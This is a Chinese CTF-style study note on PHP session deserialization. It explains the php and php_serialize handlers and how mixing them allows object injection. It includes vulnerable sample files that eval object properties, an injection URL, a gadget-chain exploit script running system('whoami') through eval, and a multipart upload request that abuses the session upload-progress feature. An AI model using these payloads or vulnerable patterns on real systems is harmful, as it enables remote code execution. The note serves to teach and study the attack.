PHP 反序列化中的session考点
前言:PHP 反序列化中的session考点笔记
概念知识点
php存储session是通过反序列化进行存储的,而反序列化session的话有如下三种模式,默认使用的是php handler
-
php_serialize
-
php
-
binary
php中session文件存储的位置根据php.ini里面设置session.save_path存储的位置来决定的
设置SESSION序列化规则根据php.ini里面的session.serialize_handler来决定的
在linux中当session_start()被调用或者php.ini中session.auto_start为1时,PHP内部调用会话管理器,访问用户session被序列化以后,存储到指定目录(默认为/tmp),具体还要看管理员的设置
注意,php_serialize在5.5.4版本后新加的一种规则,5.5.4及之前版本如果设置成php_serialize会报错
session.serialize_handler = php 一直都在 它是用 | 分割
session.serialize_handler = php_serialize 5.5之后启用 它是用serialize反序列化格式分割
以 php 存储session的情况如下:
测试代码:
<?php
ini_set('session.serialize_handler', 'php');
session_start();
$_SESSION['a'] = 'aaaaaaaaaaaaaaa';
结果如下:可以看出,当SESSION存储模式为php的时候,它的存储规则为SESSION中元素的名称 | s:SESSION元素中的字符串的数量:"SESSION元素中的字符串"; 也就是 键和值中间用 ' | ' 来分割
以 php_serialize 存储session的情况如下:
<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['a'] = 'aaaaaaaaaaaaaaa';
结果如下:可以看出,当SESSION存储模式为php_serialize的时候,它的存储规则为跟正常的序列化函数serialize规则是一样的
php的session会话文件命名规则:sess_sessionid
session在反序列化中的攻击
PHP中的session的实现是没有的问题,危害主要是由于程序员的Session使用不当而引起的
如果 PHP 在序列化存储的 $_SESSION 数据时的使用的处理器和反序列化时使用的处理器不同的情况,会导致数据无法正确反序列化,通过特殊的构造,甚至可以伪造任意数据。常见的比如存入session时用的处理器为php_serialize,反序列化时用的处理器是php
观察如下两个文件,发现指定了不同的session处理器进行处理,那么当写入的时候为php_serialize handler,而读取的时候为php handler,那么此时就有可能造成SESSION反序列化的操作
文件A:
<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION["spoock"]=$_GET["a"];
文件B:
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class lemon {
var $hi;
function __construct(){
$this->hi = 'phpinfo();';
}
function __destruct() {
eval($this->hi);
}
}
访问A文件:http://127.0.0.1/A.php?a=|O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}
此时存储的值为如下:
a:1:{s:6:"spoock";s:48:"|O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}";}
那么当session处理器模式为php的时候,它的处理方式为键值方式,a:1:{s:6:"spoock";s:48:"为键,O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}";}为值
此时$this->hi的值就为echo "spoock";",所以传入的数据会按照php以|来进行反序列化,最终则会被带入eval被执行输出
upload_progress在反序列化中的利用
再来看一道CTF的题目
需要先知道的是:
session.upload_progress.enabled,当它为开启状态时,PHP能够在每一个文件上传时监测上传进度。
当一个上传在处理中,同时POST一个与php.ini中设置的session.upload_progress.name同名变量时,上传进度就可以在$_SESSION中获得。
当PHP检测到这种POST请求时,它会在$_SESSION中添加一组数据, 索引是session.upload_progress.prefix与 session.upload_progress.name连接在一起的值。
假如说正常服务器php使用的是php_serialize处理器时,若post:name=xiaoming&passwd=123456|aaaaaaaaa,
则session中存的就是a:2:{s:4:"name";s:8:"xiaoming";s:6:"passwd";s:16:"123456|aaaaaaaaa";},若还用php_serialize读取数据的话还能读取到正常数据
但若以php处理器读取时得到的就是键为a:2:{s:4:"name";s:8:"xiaoming";s:6:"passwd";s:16:"123456,
值为|后面的序列化字符串反序列化后的数据(因为php处理器存储的格式是:键名|反序列后的值)
当前代码的话没有向服务器提交数据,但是现在session.upload_progress.enabled是开启的,所以可以通过上传文件,从而在session文件中写入数据
注意:复现的时候session.upload_progress.cleanup记得为off,因为on的时候一旦读取了所有POST数据,立即清除进度信息,默认是开启的!
exp:
<?php
class foo1{
public $varr;
function __construct(){
$this->varr = new foo2();
}
}
class foo2{
public $varr;
public $obj;
function __construct(){
$this->varr = '1234567890';
$this->obj = new foo3();
}
function __toString(){
$this->obj->execute();
return $this->varr;
}
}
class foo3{
public $varr='system("whoami");';
function execute(){
eval($this->varr);
}
}
var_dump(serialize(new foo1()));
?>
那么先模拟上传包
------WebKitFormBoundaryAZdoD8jYWW22EPEX
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
|O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:17:"system("whoami");";}}}
------WebKitFormBoundaryAZdoD8jYWW22EPEX
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/plain
123
------WebKitFormBoundaryAZdoD8jYWW22EPEX--
当前记录当前的session值:a2bara3rc31u9juofds23benu2
此时session文件中的值为:
然后再去访问index.php,该文件解析session模式为 php,所以我们在上传的时候前面需要添加|来进行识别,|后面才是主要的内容
命令执行成功
参考文章:https://www.jianshu.com/p/fba614737c3d
参考文章:https://www.jb51.net/article/107101.htm
